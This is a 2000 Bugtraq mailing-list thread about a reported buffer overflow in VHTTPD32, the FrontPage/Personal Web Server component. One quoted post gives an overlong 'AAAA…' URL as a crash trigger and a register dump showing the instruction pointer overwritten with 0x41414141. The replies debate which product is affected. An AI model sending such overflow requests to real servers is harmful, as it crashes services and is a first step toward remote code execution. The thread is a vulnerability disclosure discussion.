
List:       bugtraq
Subject:    Re: More vulnerabilities in FP
From:       Ian McDonald <ian () router ! econz ! co ! nz>
Date:       2000-04-26 7:20:32

VHTTPD32 is used as part of the PWS on a 9x or NT client.

Generally it would only be run to serve web pages to a user on the same
machine. We use it for example for FrontPage files stored on the local
PC with search results.

If you had console access PWS is probably the least of the worries!!

Regards,

Ian

Daniel Dočekal wrote:
>
> That's hardly overflow in FP, VHTTPD32 does not seem to be part of WindowsNT
> and more hardly of Frontpage (could be some old version of course), what
> operating system are you using?
>
> This seems to be overflow in HTTP (Web Server, PWS or IIS) and for
> WindowsNT it was handled long time ago in some postfix and service packs.
>
> It would be good idea to include complete information about the system you
> are testing, otherwise it is useless.
>
> Daniel
>
> > -----Original Message-----
> > From: Roman [mailto:webmad@MAIL.RU]
> > Sent: Saturday, April 22, 2000 10:16 PM
> > To: BUGTRAQ@SECURITYFOCUS.COM
> > Subject: Re: More vulnerabilities in FP
> >
> >
> > Hello,
> >
> > > First remote FrontPage exploit?
> >
> > How about this one:
> > http://server/AAAAAAAAAAAA<a lots of A>AAAAAA
> >
> > FP will overflow and someone will see this message:
> >
> > VHTTPD32 caused an invalid page fault in
> > module <unknown> at 0000:41414141.
> > Registers:
> > EAX=00000000 CS=0167 EIP=41414141 EFLGS=00010212
> > EBX=00000000 SS=016f ESP=00fe53cc EBP=41414141
> > ECX=00fe52c4 DS=016f ESI=00fe7744 FS=3647
> > EDX=bffc9490 ES=016f EDI=bff94645 GS=0000
> > Bytes at CS:EIP:
> >
> > Stack dump:
> > 41414141 41414141 66204141 656c6961 6f662064 32312072
> > 2e302e37 2c312e30 61657220 3a6e6f73 6c696620 6f642065
> > 6e207365 6520746f 74736978 00000000
> >
> > Tested on FP 3.0.2.926. Maybe others?
> >

--
====================================================================
| Ian McDonald         | email: ian@econz.co.nz   Ph: 09-378 8611  |
| Technical Consultant | ICQ 31381444            Fax: 09-378 9010  |
|                      |                      Mobile: 025-728 724  |
|                      | mail: PO Box 68-261 Newton Auckland       |
| ECONZ (1971) Ltd     | Visit our WEBSITE: http://www.econz.co.nz |
--------------------------------------------------------------------
